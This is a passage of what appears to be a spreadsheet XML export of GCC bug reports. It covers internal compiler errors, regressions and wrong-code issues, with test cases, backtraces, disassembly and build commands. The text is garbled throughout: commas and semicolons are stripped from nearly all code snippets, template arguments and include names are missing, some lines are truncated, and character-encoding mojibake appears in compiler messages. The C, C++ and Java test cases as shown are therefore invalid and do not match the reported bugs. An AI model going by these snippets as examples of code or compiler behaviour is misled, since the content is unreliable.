(2011-06-27) and also with GCC 4.5.1 but not with 4.4.5. I'm on Ubuntu 10.10 x86-64.
cat &gt;test.c &lt;&lt;EOF
extern int g_27 g_115
void func_1(int x) {
    g_27 = 2 g_115 = 0
    g_115 = (g_27 
}
EOF
gcc -O1 -fno-tree-fre -c test.c
test.c: In function â€˜func_1â€™:
test.c:5:1: internal compiler error: in simplify_subreg at simplify-rtx.c:5362
GCC 4.5.1 also ICEs on this input. The line number in 4.5.1 is simplify-rtx.c:5140.
This test case is reduced from the output of Csmith 2.1.0 (git hash 01aa8b04
https://github.com/Quuxplusone/csmith/) using the following command line:
csmith --no-paranoid --longlong --no-pointers --no-arrays --no-jumps --no-consts --no-volatiles --checksum --no-divs --no-muls --bitfields --packed-struct -s 1343472353</t>
  </si>
  <si>
    <t>GCC-10437</t>
  </si>
  <si>
    <t>using namespace at global scope creates incorrect code</t>
  </si>
  <si>
    <t>Code compiles differently if it looks like:
using namespace foo
main()
{
  /* ... */
}
VS:
main()
{
  using namespace foo
   /* ... */
}
My guess is that templates in the namespace foo are instantiated incorrectly.  I'm not totally possitive this is an error but it seems like either an error in g++ or an error in the definition of how templates should be instantiated.
I cut the file down from several 1000 lines of code to under 400 lines.  I'm sorry that I haven't been able to reproduce it with fewer lines of code.  But if you look at the last 20 lines of code I have flagged the troublesome statement.
Release:
g++ 3.2.2
Environment:
linux
How-To-Repeat:
uncomment the line marked that is near the end of the file.</t>
  </si>
  <si>
    <t>GCC-49596</t>
  </si>
  <si>
    <t>[4.7 Regression] FAIL: gcc.dg/torture/pr43879_1.c</t>
  </si>
  <si>
    <t>On Linux/x86 revision 175707
http://gcc.gnu.org/ml/gcc-cvs/2011-06/msg01199.html
caused:
FAIL: gcc.dg/torture/pr43879_1.c  -O1  execution test
FAIL: gcc.dg/torture/pr43879_1.c  -O2  execution test
FAIL: gcc.dg/torture/pr43879_1.c  -O3 -fomit-frame-pointer  execution test
FAIL: gcc.dg/torture/pr43879_1.c  -O3 -g  execution test
FAIL: gcc.dg/torture/pr43879_1.c  -Os  execution test</t>
  </si>
  <si>
    <t>GCC-4092</t>
  </si>
  <si>
    <t>Use of ANSI features in gcc/cp/class.c</t>
  </si>
  <si>
    <t>In gcc/cp/class.c there's a few places where ANSI C
constructs are used which prevents the source being
compiled with a K&amp;R compiler (which you do need to do
for this file):
Line 2382 (end of finish_struct_methods() function):
    qsort (&amp;TREE_VEC_ELT (method_vec slot) len-slot sizeof (tree)
           (int (*)(const void * const void *))method_name_cmp)
(the function prototype for method_name_cmp causes a K&amp;R C
compiler to bomb out)
Line 5463 (middle of finish_struct_1() function):
      qsort (&amp;TREE_VEC_ELT (field_vec 0) n_fields sizeof (tree)
             (int (*)(const void * const void *))field_decl_cmp)
(same problem as the one above)
Line 4018 (layout_nonempty_base_or_field):
      struct record_layout_info_s old_rli = *rli
(this assignment is illegal in K&amp;R C)
Release:
gcc 3.0.1
Environment:
HP-UX 11.00 but applies to all platforms
How-To-Repeat:
Build gcc 3.0.1 with a strictly K&amp;R C compiler - you can
use the standard cc in HP-UX (or the HP-UX ANSI C with
CFLAGS=-Ac) to reproduce this. On a side note it appears
to me that the gcc team don't actually do this - there
are other instances of K&amp;R-illegal code in gcc 3.0.1 as
well (if I get the time I'll file them but this bug
should hopefully spark the developers to fix them all).
Not allowing
K&amp;R C compilers to build gcc 3.X is quite poor IMHO
especially since you could with 2.95.3.</t>
  </si>
  <si>
    <t>GCC-60218</t>
  </si>
  <si>
    <t>[c++11] ICE using __bases for broken class hierarchy</t>
  </si>
  <si>
    <t>The following invalid code snippet (compiled with -std=c++11) triggers
an ICE since GCC 4.7.0 (when __bases was introduced):
==================================
template struct A {}
template struct B
{
  typedef A C
}
struct X {}
struct Y : X* {}
B b
==================================
bug.cc:9:13: error: expected '{' before '*' token
 struct Y : X* {}
             ^
bug.cc:9:15: error: expected unqualified-id before '{' token
 struct Y : X* {}
               ^
bug.cc:9:15: error: invalid type in declaration before '{' token
bug.cc: In instantiation of 'struct B':
bug.cc:11:6:   required from here
bug.cc:5:28: internal compiler error: Segmentation fault
   typedef A C
                            ^
0xba53bf crash_signal
        ../../gcc/gcc/toplev.c:337
0x7214a0 tree_check
        ../../gcc/gcc/tree.h:2708
0x7214a0 dfs_calculate_bases_pre
        ../../gcc/gcc/cp/semantics.c:3696
0x71c30e dfs_walk_all(tree_node* tree_node* (*)(tree_node* void*) tree_node* (*)(tree_node* void*) void*)
        ../../gcc/gcc/cp/search.c:1583
0x721c08 calculate_bases_helper
        ../../gcc/gcc/cp/semantics.c:3718
0x73a427 calculate_bases(tree_node*)
        ../../gcc/gcc/cp/semantics.c:3748
0x618da3 tsubst_pack_expansion
        ../../gcc/gcc/cp/pt.c:9558
0x628eb2 tsubst_template_args
        ../../gcc/gcc/cp/pt.c:9792
0x628cf5 tsubst_template_args
        ../../gcc/gcc/cp/pt.c:9810
0x6296a3 tsubst_aggr_type
        ../../gcc/gcc/cp/pt.c:10025
0x61ba41 tsubst(tree_node* tree_node* int tree_node*)
        ../../gcc/gcc/cp/pt.c:11436
0x62dbde tsubst_decl
        ../../gcc/gcc/cp/pt.c:10908
0x61beef tsubst(tree_node* tree_node* int tree_node*)
        ../../gcc/gcc/cp/pt.c:11357
0x64a39a instantiate_class_template_1
        ../../gcc/gcc/cp/pt.c:9010
0x64a39a instantiate_class_template(tree_node*)
        ../../gcc/gcc/cp/pt.c:9274
0x6db9c3 complete_type(tree_node*)
        ../../gcc/gcc/cp/typeck.c:134
0x5c4f88 start_decl_1(tree_node* bool)
        ../../gcc/gcc/cp/decl.c:4719
0x5edeb7 start_decl(cp_declarator const* cp_decl_specifier_seq* int tree_node* tree_node* tree_node**)
        ../../gcc/gcc/cp/decl.c:4682
0x6c7eee cp_parser_init_declarator
        ../../gcc/gcc/cp/parser.c:16680
0x6c9979 cp_parser_simple_declaration
        ../../gcc/gcc/cp/parser.c:11205
Please submit a full bug report [etc.]</t>
  </si>
  <si>
    <t>GCC-6248</t>
  </si>
  <si>
    <t>gcc 2.95.3 and 3.0.4 accept bool assigned to bool * function parameter</t>
  </si>
  <si>
    <t>g++ from 2.95.3 and 3.0.4 allow passing a constant parameter false to a function with bool * parameter without complaint.  There is a complaint when true is passed rather than false:
foo.cc: In function `int main()':
foo.cc:7: passing `bool' to argument 1 of `foo(bool *)' lacks a cast
gcc-2.8.1 complains either way with the following:
foo.cc: In function `int main()':
foo.cc:7: argument passing to `bool *' from `bool'
Release:
2.8.1 2.95.3 3.0.4
Environment:
Sun Solaris 8
How-To-Repeat:
compile foo.cc with g++ from 2.8.1 and 2.95.3 to see compiler errors</t>
  </si>
  <si>
    <t>akjones</t>
  </si>
  <si>
    <t>GCC-7283</t>
  </si>
  <si>
    <t>ICE on recursive import of inner classes</t>
  </si>
  <si>
    <t xml:space="preserve">
Release:
3.2 20020710 (experimental)
Environment:
System: Linux churchill 2.4.3-12 #1 Fri Jun 8 15:05:56 EDT 2001 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ./configure --prefix=/home/user/jmr/app/gcc
How-To-Repeat:
    Create one file X.java:
    package p
    import p.Y.YY
    public class X {
        public class XX {
        }
    }
    And another Y.java:
    package p
    import p.X.XX
    public class Y {
        public class YY {
        }
    }
    gcj -v X.java gives:
    Reading specs from /home/user/jmr/app/gcc/lib/gcc-lib/i686-pc-linux-gnu/3.2/specs
    Reading specs from /home/user/jmr/app/gcc/lib/gcc-lib/i686-pc-linux-gnu/3.2/../../../libgcj.spec
    rename spec lib to liborig
    Configured with: ./configure --prefix=/home/user/jmr/app/gcc
    Thread model: single
    gcc version 3.2 20020710 (experimental)
     /home/user/jmr/app/gcc/lib/gcc-lib/i686-pc-linux-gnu/3.2/jc1 X.java -fno-use-divide-subroutine -fuse-boehm-gc -fnon-call-exceptions -fkeep-inline-functions -quiet -dumpbase X.java -g1 -version -o /tmp/ccGfcO76.s
    GNU Java version 3.2 20020710 (experimental) (i686-pc-linux-gnu)
            compiled by GNU C version 2.96 20000731 (Red Hat Linux 7.1 2.96-85).
    Class path starts here:
        /home/user/jmr/gcj_test/nested/
        /home/user/jmr/app/gcc/share/java/libgcj-3.2.jar/ (system) (zip)
    /home/user/jmr/gcj_test/nested/p/X.java:5: error: Class `p.X' already defined in X.java:5.
       public class X {
                    ^
    /home/user/jmr/gcj_test/nested/p/X.java:6: internal compiler error: tree check: expected class 'd' have 'x' (error_mark) in make_nested_class_name at java/parse.y:3539
    Please submit a full bug report
    with preprocessed source if appropriate.
    See  for instructions.
    Javac accepts this code.</t>
  </si>
  <si>
    <t>GCC-28393</t>
  </si>
  <si>
    <t>gcc gives a core dump when compiling a C program cc works fine.</t>
  </si>
  <si>
    <t>I need to build on linux but I get a segmentation fault (core dump) so I try on Sun and I get the same behavior but cc works fine.
GCC version:
Reading specs from ../lib/gcc-lib/i686-pc-linux-gnu/3.2.3/specs
Configured with: ./configure --prefix=/free/GNU_BUILD/G1/devenv/distrib/i686/2.4.7-10/gcc-3.2.3 --disable-nls --enable-languages=cc++f77 --with-gnu-as -with-as=/free/GNU_BUILD/G1/devenv/install/i686/2.4.7-10/bin/as --with-gnu-ld -with-ld=/free/GNU_BUILD/G1/devenv/install/i686/2.4.7-10/bin/ld --enable-gcc
Thread model: posix
gcc version 3.2.3
System type:
Linux 2.4.21-4.ELsmp #1 SMP Fri Oct 3 17:52:56 EDT 2003 i686 i686 i386 GNU/Linux
Command:
bin/gcc  -IFlex_inhouse/include -Imgls_inhouse/include -s -o ../ixl_op/pb pb.c Flex_inhouse/lib/libAnacadFlex.a mgls_inhouse/lib/libmgls.a -lnsl
message I get:
gcc: Internal error: Segmentation fault (program cc1)
Please submit a full bug report.
See  for instructions.
gnumake: *** [../ixl_op/pb] Error 1
Expected behavior:
output file generated
I tried to separate building and linking and I get the problem in the building phase.
When I reduce the size of the character variable building works fine.</t>
  </si>
  <si>
    <t>mohamed_selim</t>
  </si>
  <si>
    <t>GCC-19801</t>
  </si>
  <si>
    <t>[4.0 Regression] cppinternals.texi references old file names</t>
  </si>
  <si>
    <t>cppinternals.texi refers to old file names cpphash.h cpplex.c cppfiles.c.
In 4.0 the files have been renamed.</t>
  </si>
  <si>
    <t>GCC-48461</t>
  </si>
  <si>
    <t>[4.7 Regression] function.c:5268:1: error: emit_use_return_register_into_block defined but not used</t>
  </si>
  <si>
    <t>/home/dave/opt/gnu/gcc/gcc-4.7.0/hppa-linux-gnu/sys-include    -c   -g -O2 -DIN_GCC   -W -Wall -Wwrite-strings -Wcast-qual -Wstrict-prototypes -Wmissing-prototypes -Wmissing-format-attribute -pedantic -Wno-long-long -Wno-variadic-macros -Wno-overlength-strings -Werror -Wold-style-definition -Wc++-compat -fno-common  -DHAVE_CONFIG_H -I. -I. -I../../gcc/gcc -I../../gcc/gcc/. -I../../gcc/gcc/../include -I../../gcc/gcc/../libcpp/include  -I../../gcc/gcc/../libdecnumber -I../../gcc/gcc/../libdecnumber/dpd -I../libdecnumber    ../../gcc/gcc/function.c -o function.o
../../gcc/gcc/function.c:5268:1: error: Ã¢emit_use_return_register_into_blockÃ¢ defined but not used [-Werror=unused-function]
cc1: all warnings being treated as errors</t>
  </si>
  <si>
    <t>GCC-58361</t>
  </si>
  <si>
    <t>Wrong floating point code generated for ARM target</t>
  </si>
  <si>
    <t>Created attachment 30765
Preprocessed example code
Example code:
-------------
#include 
static const float LANCE_SPEED = 0.5f
float posx = 0.0f posy = 0.0f
float _deg = 0.0f
float test(int cnt) {
  float sp
  if (cnt &lt; 10)
    sp = LANCE_SPEED * cnt / 10
  else
    sp = LANCE_SPEED
  float degSin = sin(_deg)
  float degCos = cos(_deg)
  posx += degSin * sp
  posy += degCos * sp
  return sp
}
-------------
Compiling the example code with parameters -c -O2 -pipe -march=armv7-a -mcpu=cortex-a8 -mtune=cortex-a8 -mfpu=vfpv3 -mfloat-abi=softfp generates wrong code for the case when the input parameter is 10 or more.
The preprocessed source is in the attachment.
The result of objdump -S -r is:
-------------
shot2.o:     file format elf32-littlearm
Disassembly of section .text:
00000000 :
   0:	e3500009 	cmp	r0 #9
   4:	e92d4010 	push	{r4 lr}
   8:	ed2d8b02 	vpush	{d8}
   c:	ceb68a00 	vmovgt.f32	s16 #96	 0x60
  10:	e24dd008 	sub	sp sp #8
  14:	def27a04 	vmovle.f32	s15 #36	 0x24
  18:	de080a10 	vmovle	s16 r0
  1c:	eeba8aef 	vcvt.f32.s32	s16 s16 #1
  20:	de888a27 	vdivle.f32	s16 s16 s15
  24:	e59f403c 	ldr	r4 [pc #60]	 68 
  28:	e28d1004 	add	r1 sp #4
  2c:	e1a0200d 	mov	r2 sp
  30:	e5940000 	ldr	r0 [r4]
  34:	ebfffffe 	bl	0 
			34: R_ARM_CALL	sincosf
  38:	edd47a01 	vldr	s15 [r4 #4]
  3c:	ed947a02 	vldr	s14 [r4 #8]
  40:	eddd6a00 	vldr	s13 [sp]
  44:	ee067a88 	vmla.f32	s14 s13 s16
  48:	eddd6a01 	vldr	s13 [sp #4]
  4c:	ee180a10 	vmov	r0 s16
  50:	ee467a88 	vmla.f32	s15 s13 s16
  54:	ed847a02 	vstr	s14 [r4 #8]
  58:	edc47a01 	vstr	s15 [r4 #4]
  5c:	e28dd008 	add	sp sp #8
  60:	ecbd8b02 	vpop	{d8}
  64:	e8bd8010 	pop	{r4 pc}
  68:	00000000 	.word	0x00000000
			68: R_ARM_ABS32	.bss
-------------
The instruction at address c assigns the value 0.5f to register s16 and the instruction at address 1c changes the value in register s16 (but it shouldn't in case r0 &gt; 9).
I'm using a GCC crosscompiler for ARM linux (running on x64 linux) - gcc
version 4.7.3.
The result of gcc -v is:
-------------
Using built-in specs.
COLLECT_GCC=/opt/pandora/arm-2013.06.10/bin/pandora-gcc
COLLECT_LTO_WRAPPER=/opt/pandora/arm-2013.06.10/bin/../libexec/gcc/arm-cortex_a8-linux-gnueabi/4.7.3/lto-wrapper
Target: arm-cortex_a8-linux-gnueabi
Configured with: /home/roman/toolchain/.build/src/gcc-4.7.3/configure --build=x86_64-build_unknown-linux-gnu --host=x86_64-build_unknown-linux-gnu --target=arm-cortex_a8-linux-gnueabi --prefix=/home/roman/x-tools/arm-cortex_a8-linux-gnueabi --with-sysroot=/home/roman/x-tools/arm-cortex_a8-linux-gnueabi/arm-cortex_a8-linux-gnueabi/sysroot --enable-languages=cc++d --with-arch=armv7-a --with-cpu=cortex-a8 --with-tune=cortex-a8 --with-fpu=vfpv3 --with-float=softfp --with-pkgversion='crosstool-NG hg+unknown-20130627.210751' --enable-__cxa_atexit --disable-libmudflap --disable-libgomp --disable-libssp --disable-libquadmath --disable-libquadmath-support --with-gmp=/home/roman/toolchain/.build/arm-cortex_a8-linux-gnueabi/buildtools --with-mpfr=/home/roman/toolchain/.build/arm-cortex_a8-linux-gnueabi/buildtools --with-mpc=/home/roman/toolchain/.build/arm-cortex_a8-linux-gnueabi/buildtools --with-ppl=/home/roman/toolchain/.build/arm-cortex_a8-linux-gnueabi/buildtools --with-cloog=/home/roman/toolchain/.build/arm-cortex_a8-linux-gnueabi/buildtools --with-libelf=/home/roman/toolchain/.build/arm-cortex_a8-linux-gnueabi/buildtools --with-host-libstdcxx='-static-libgcc -Wl-Bstatic-lstdc++-Bdynamic -lm -L/home/roman/toolchain/.build/arm-cortex_a8-linux-gnueabi/buildtools/lib -lpwl' --enable-threads=posix --enable-target-optspace --disable-nls --disable-multilib --with-local-prefix=/home/roman/x-tools/arm-cortex_a8-linux-gnueabi/arm-cortex_a8-linux-gnueabi/sysroot --enable-c99 --enable-long-long
Thread model: posix
gcc version 4.7.3 (crosstool-NG hg+unknown-20130627.210751) 
-------------</t>
  </si>
  <si>
    <t>power</t>
  </si>
  <si>
    <t>GCC-51872</t>
  </si>
  <si>
    <t>[4.7 Regression] Shrink-wrapping with -mminimal-toc causes bootstrap failure</t>
  </si>
  <si>
    <t>powerpc64-linux doesn't bootstrap with -mminimal-toc in CFLAGS/CXXFLAGS due to shrink-wrapping as crtbegin.o is miscompiled.
Short testcase for -m64 -O2 -mminimal-toc:
static void *var[] __attribute__ ((used section(jlist) aligned(sizeof(void*)))) = { }
extern void bar (void *) __attribute__ ((weak))
static void __attribute__((noinline noclone))
baz (void)
{
  asm volatile ( : : : memory)
}
void
foo (void)
{
  if (var[0])
    {
      void (*register_classes) (void *) = bar
      __asm ( : +r (register_classes))
      if (register_classes)
       register_classes (var)
    }
  baz ()
}
The problem is that the TOC register (r30) isn't added to the set_up_by_prologue
regset (flag_pic is 0 TARGET_MINIMAL_TOC is true and the prologue computes the
TOC_REGISTER).  I wonder if we don't need a target hook that will add additional registers to set_up_by_prologue regset.</t>
  </si>
  <si>
    <t>GCC-10157</t>
  </si>
  <si>
    <t>[3.4 regression] [Sparc] internal compiler error: in extract_insn at recog.c:2188</t>
  </si>
  <si>
    <t>Compiler generates ICE when optimizing the attached code.
Release:
3.4 20030315 (experimental)
Environment:
System: SunOS scooby 5.9 Generic_112233-04 sun4u sparc SUNWSun-Blade-100
Architecture: sun4
host: sparc-sun-solaris2.9
build: sparc-sun-solaris2.9
target: sparc-sun-solaris2.9
configured with: /scratch/temp/cvs/gcc/configure --prefix=/opt/local/gcc340 --enable-languages=cc++f77
How-To-Repeat:
scooby&gt;	gcc -v -c -O3 -ffast-math h2.c
Reading specs from /opt/local/gcc340/lib/gcc-lib/sparc-sun-solaris2.9/3.4/specs
Configured with: /scratch/temp/cvs/gcc/configure --prefix=/opt/local/gcc340 --enable-languages=cc++f77
Thread model: posix
gcc version 3.4 20030315 (experimental)
 /opt/local/gcc340/lib/gcc-lib/sparc-sun-solaris2.9/3.4/cc1 -quiet -v -Dsparc -D__sparc__ -D__sparc -D__GCC_NEW_VARARGS__ -Acpu=sparc -Amachine=sparc h2.c -quiet -dumpbase h2.c -auxbase h2 -O3 -version -ffast-math -o /var/tmp//ccUWwD2c.s
ignoring nonexistent directory /opt/local/gcc340/sparc-sun-solaris2.9/include
#include ... search starts here:
#include  search starts here:
 /usr/local/include
 /opt/local/gcc340/include
 /opt/local/gcc340/lib/gcc-lib/sparc-sun-solaris2.9/3.4/include
 /usr/include
End of search list.
GNU C version 3.4 20030315 (experimental) (sparc-sun-solaris2.9)
	compiled by GNU C version 3.4 20030315 (experimental).
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
h2.c: In function `g':
h2.c:15: error: unrecognizable insn:
(insn:HI 134 133 8 0 0 (set (reg:CCFPE 127)
        (compare:CCFPE (reg/v:DF 109 [ p ])
            (reg:DF 111))) -1 (insn_list 133 (nil))
    (expr_list:REG_DEAD (reg/v:DF 109 [ p ])
        (expr_list:REG_DEAD (reg:DF 111)
            (expr_list:REG_EQUAL (compare:CCFPE (reg/v:DF 109 [ p ])
                    (const_double:DF 1.0e+0 [0x0.8p+1]))
                (nil)))))
h2.c:15: internal compiler error: in extract_insn at recog.c:2188
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
scooby&gt;	cat h2.c
void h() {
	int in
	double pr
	for( i=0 i &lt; n i++ )
		if( p &gt; 1. )
			for( i=0 i &lt; n i++ )
				r += 2.
	return
}
void g() {
	while( 1 )
		h()
	return
}</t>
  </si>
  <si>
    <t>GCC-26109</t>
  </si>
  <si>
    <t>ICE: Segmentation fault (program cc1) compiling _muldi3.o in stage1</t>
  </si>
  <si>
    <t>/mnt/gnu/gcc-3.3/objdir/./gcc/xgcc -B/mnt/gnu/gcc-3.3/objdir/./gcc/ -B/opt/gnu/g
cc/gcc-4.2.0/hppa2.0w-hp-hpux11.11/bin/ -B/opt/gnu/gcc/gcc-4.2.0/hppa2.0w-hp-hpu
x11.11/lib/ -isystem /opt/gnu/gcc/gcc-4.2.0/hppa2.0w-hp-hpux11.11/include -isyst
em /opt/gnu/gcc/gcc-4.2.0/hppa2.0w-hp-hpux11.11/sys-include -O2  -O2 -g -O2  -DI
N_GCC    -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes -Wold
-style-definition  -isystem ./include  -fPIC -g -DHAVE_GTHR_DEFAULT -DIN_LIBGCC2
 -D__GCC_FLOAT_NOT_NEEDED  -I. -I. -I../../gcc/gcc -I../../gcc/gcc/. -I../../gcc
/gcc/../include -I../../gcc/gcc/../libcpp/include -I/opt/gnu/gcc/gcc-4.2.0/inclu
de  -I../../gcc/gcc/../libdecnumber -I../libdecnumber -DL_muldi3  -c ../../gcc/g
cc/libgcc2.c -o libgcc/./_muldi3.o
xgcc: Internal error: Segmentation fault (program cc1)
Please submit a full bug report.
See  for instructions.
make[4]: *** [libgcc/./_muldi3.o] Error 1
# ./xgcc -v
Using built-in specs.
Target: hppa2.0w-hp-hpux11.11
Configured with: ../gcc/configure --with-gnu-as --with-as=/opt/gnu/bin/as --enable-shared --disable-nls --with-local-prefix=/opt/gnu --prefix=/opt/gnu/gcc/gcc-4.2.0 --enable-debug=no --enable-threads=posix --with-gmp=/opt/gnu/gcc/gcc-4.2.0 --disable-libmudflap --enable-languages=cc++objcobj-c++fortranjavaada
Thread model: posix
gcc version 4.2.0 20060205 (experimental)
This error occurs when the -mpa-risc-2-0 option is added to CC.  I see
this problem using both gcc 3.4.5 and 4.1.0 20060127 (prerelease) as the
bootstrap compiler.
gdb) r `cat xx.sh`
Starting program: /mnt/gnu/gcc-3.3/objdir/gcc/cc1 `cat xx.sh`
Breakpoint 3 at 0x7af87744
Breakpoint 4 at 0x7afeb230
Program received signal SIGSEGV Segmentation fault.
0x008d7058 in htab_create_alloc (size=1 hash_f=0x4001850a 
    eq_f=0x40018512  del_f=0
    alloc_f=0x40017b5a  free_f=0)
    at ../../gcc/libiberty/hashtab.c:295
295       size = prime_tab[size_prime_index].prime
(gdb) disass 0x008d7038 0x008d7078
Dump of assembler code from 0x8d7038 to 0x8d7078:
0x008d7038 :      stw r3-64(sp)
0x008d703c :      ldi 1r26
0x008d7040 :      depwz ret02728r19
0x008d7044 :      copy ret0r5
0x008d7048 :      copy r6r22
0x008d704c :      ldil 94b000ret0
0x008d7050 :      ldi 3cr25
0x008d7054 :      ldo 2b4(ret0)ret0
0x008d7058 :      ldw r19(ret0)r4
0x008d705c :      bel 27d68(sr4r0)%sr0%r31
0x008d7060 :      copy rpr31
0x008d7064 :     movb=n ret0r260x8d70d0 
0x008d7068 :     copy r26r3
0x008d706c :     ldi 4r25
0x008d7070 :     copy r4r26
0x008d7074 :     copy r6r22
(gdb) p/x $r19
$1 = 0xaedf0000
(gdb) p/x $ret0
$2 = 0x94b2b4
(gdb) p/x &amp;prime_tab
$3 = 0x94b2b4</t>
  </si>
  <si>
    <t>GCC-64131</t>
  </si>
  <si>
    <t>[5 Regression] libsanitizer fails to build for AARCH64 with the glibc from the trunk</t>
  </si>
  <si>
    <t>libsanitizer is broken for AARCH64 with the trunk version of glibc.
In file included from /data1/src/gcc-cavium/toolchain-thunder/scripts/../src/libsanitizer/sanitizer_common/sanitizer_platform_limits_posix.cc:176:0:
/data1/src/gcc-cavium/toolchain-thunder/scripts/../src/libsanitizer/sanitizer_common/sanitizer_internal_defs.h:272:72: error: size of array â€˜assertion_failed__1058â€™ is negative
     typedef char IMPL_PASTE(assertion_failed_##_ line)[2*(int)(pred)-1]
                                                                        ^
/data1/src/gcc-cavium/toolchain-thunder/scripts/../src/libsanitizer/sanitizer_common/sanitizer_internal_defs.h:266:30: note: in expansion of macro â€˜IMPL_COMPILER_ASSERTâ€™
 #define COMPILER_CHECK(pred) IMPL_COMPILER_ASSERT(pred __LINE__)
                              ^
/data1/src/gcc-cavium/toolchain-thunder/scripts/../src/libsanitizer/sanitizer_common/sanitizer_platform_limits_posix.h:1288:3: note: in expansion of macro â€˜COMPILER_CHECKâ€™
   COMPILER_CHECK(sizeof(((__sanitizer_##CLASS *) NULL)-&gt;MEMBER) == \
   ^
/data1/src/gcc-cavium/toolchain-thunder/scripts/../src/libsanitizer/sanitizer_common/sanitizer_platform_limits_posix.cc:1058:1: note: in expansion of macro â€˜CHECK_SIZE_AND_OFFSETâ€™
 CHECK_SIZE_AND_OFFSET(ipc_perm mode)
 ^
make[5]: *** [sanitizer_platform_limits_posix.lo] Error 1</t>
  </si>
  <si>
    <t>GCC-9122</t>
  </si>
  <si>
    <t>qualified name forced to be used in non-public derived class</t>
  </si>
  <si>
    <t>If a class inhereit from another class which further non-publicly inherit yet another third class. Any member or parameters that use not full qualified name of the third class will fail to compile.
`class XXX' is inaccessible
in which XXX is the name of the third class.
gcc 2.95-3 does not has this problem.
Release:
unknown
Environment:
Win2k + mingw2.0(gcc3.2 and rc2 of gcc3.2.1)
Redhad Linux 8.0 + gcc3.2
How-To-Repeat:
// test.cpp compile with g++ -c test.cpp
class A {}
class B : A {}
class C : public B {
public:
	A* p // compiler report : `class A' is inaccessible
}</t>
  </si>
  <si>
    <t>hou_zhenyu</t>
  </si>
  <si>
    <t>GCC-60253</t>
  </si>
  <si>
    <t>[4.7/4.8/4.9 Regression] ICE passing class object through ellipsis (...)</t>
  </si>
  <si>
    <t>The following invalid code snippet triggers an ICE since GCC 4.7.0:
====================================
struct A
{
  ~A()
}
struct B
{
  B(...)
}
B b(0 A())
====================================
bug.cc:11:11: error: cannot pass objects of non-trivially-copyable type 'struct A' through '...'
 B b(0 A())
           ^
bug.cc: In function 'void __static_initialization_and_destruction_0(int int)':
bug.cc:11:3: internal compiler error: in create_tmp_var at gimple-expr.c:506
 B b(0 A())
   ^
0x9d4fa3 create_tmp_var(tree_node* char const*)
        ../../gcc/gcc/gimple-expr.c:506
0x9fe66c create_tmp_from_val
        ../../gcc/gcc/gimplify.c:457
0x9fe66c lookup_tmp_var
        ../../gcc/gcc/gimplify.c:479
0x9fe66c internal_get_tmp_var
        ../../gcc/gcc/gimplify.c:523
0x9f7261 gimplify_expr(tree_node** gimple_statement_base** gimple_statement_base** bool (*)(tree_node*) int)
        ../../gcc/gcc/gimplify.c:8346
0xa02038 gimplify_call_expr
        ../../gcc/gcc/gimplify.c:2375
0x9f76b7 gimplify_expr(tree_node** gimple_statement_base** gimple_statement_base** bool (*)(tree_node*) int)
        ../../gcc/gcc/gimplify.c:7419
0x9fc086 gimplify_stmt(tree_node** gimple_statement_base**)
        ../../gcc/gcc/gimplify.c:5341
0x9f7742 gimplify_cleanup_point_expr
        ../../gcc/gcc/gimplify.c:5117
0x9f7742 gimplify_expr(tree_node** gimple_statement_base** gimple_statement_base** bool (*)(tree_node*) int)
        ../../gcc/gcc/gimplify.c:7811
0x9fc086 gimplify_stmt(tree_node** gimple_statement_base**)
        ../../gcc/gcc/gimplify.c:5341
0x9f81ab gimplify_statement_list
        ../../gcc/gcc/gimplify.c:1412
0x9f81ab gimplify_expr(tree_node** gimple_statement_base** gimple_statement_base** bool (*)(tree_node*) int)
        ../../gcc/gcc/gimplify.c:7863
0x9fc086 gimplify_stmt(tree_node** gimple_statement_base**)
        ../../gcc/gcc/gimplify.c:5341
0xa00571 gimplify_cond_expr
        ../../gcc/gcc/gimplify.c:3066
0x9f7c1c gimplify_expr(tree_node** gimple_statement_base** gimple_statement_base** bool (*)(tree_node*) int)
        ../../gcc/gcc/gimplify.c:7404
0x9fc086 gimplify_stmt(tree_node** gimple_statement_base**)
        ../../gcc/gcc/gimplify.c:5341
0xa00571 gimplify_cond_expr
        ../../gcc/gcc/gimplify.c:3066
0x9f7c1c gimplify_expr(tree_node** gimple_statement_base** gimple_statement_base** bool (*)(tree_node*) int)
        ../../gcc/gcc/gimplify.c:7404
0x9fc086 gimplify_stmt(tree_node** gimple_statement_base**)
        ../../gcc/gcc/gimplify.c:5341
Please submit a full bug report [etc.]</t>
  </si>
  <si>
    <t>GCC-41250</t>
  </si>
  <si>
    <t>hppa has DECL_VALUE_EXPR decls appearing in the function</t>
  </si>
  <si>
    <t>When investigating PR 40464 I have come across a declaration with
DECL_HAS_VALUE_EXPR_P and DECL_VALUE_EXPR set (which indeed turned out
to be the root of the problem).  However according to a comment in
tree.h: once this field has been set the decl itself may not
legitimately appear in the function.
Richard Guenther has written a patch to verify there are none such
declarations in the function statements and found none on an x86_64
(and so did I).  However when I run the test on a hppa I got over two
hundred failures in the c testsuite alone.
The patch is at
  http://gcc.gnu.org/ml/gcc-patches/2009-08/msg00419.html
Steps to reproduce: 1) apply the patch above 2) compile gcc (probably
irrespective of configuration but see below) and 3) run the c testsuite.
For the sake of completeness I have configured gcc with:
  /home/jamborm/gcc/trunk/configure --prefix=/home/jamborm/gcc/inst/trunk/ --enable-checking=yes --enable-languages=cc++ --disable-bootstrap --with-mpfr=/opt/cfarm/mpfr-2.3.2/ --disable-multilib</t>
  </si>
  <si>
    <t>GCC-66838</t>
  </si>
  <si>
    <t>[5 Regression] Calling multiple SYSV AMD64 ABI functions from MS x64 ABI one results in clobbered parameters</t>
  </si>
  <si>
    <t>Created attachment 35951
clobber_repro.c
This seems to be yet another corner case of bug 57003.
Description:
Calling a sequence of SYSV AMD64 ABI functions from an __attribute__((ms_abi)) function while passing an address of the same global variable to them results in all but the first one in the sequence receiving clobbered values instead of the expected address.
In code:
__attribute__((ms_abi noinline noclone)) void ms_abi_func() {
        sysv_abi_func(1st call 
        sysv_abi_func(2nd call 
        sysv_abi_func(3rd call 
}
In this example only the first call of the sysv_abi_func is passed the address of the global variable global. All the other calls of the function are passed clobbered values.
To see the problem:
- generate assembly for the attached clobber_repro.c for the x86_64 architecture as follows:
        gcc -S -O1 -m64 -o clobber_repro.S clobber_repro.c
- inspect the assembly code for the ms_abi_func fucntion
- you should see something like this after the function's prologue code:
        movl    $global %esi
        movl    $.LC2 %edi
        call    sysv_abi_func
        movl    $.LC3 %edi
        call    sysv_abi_func
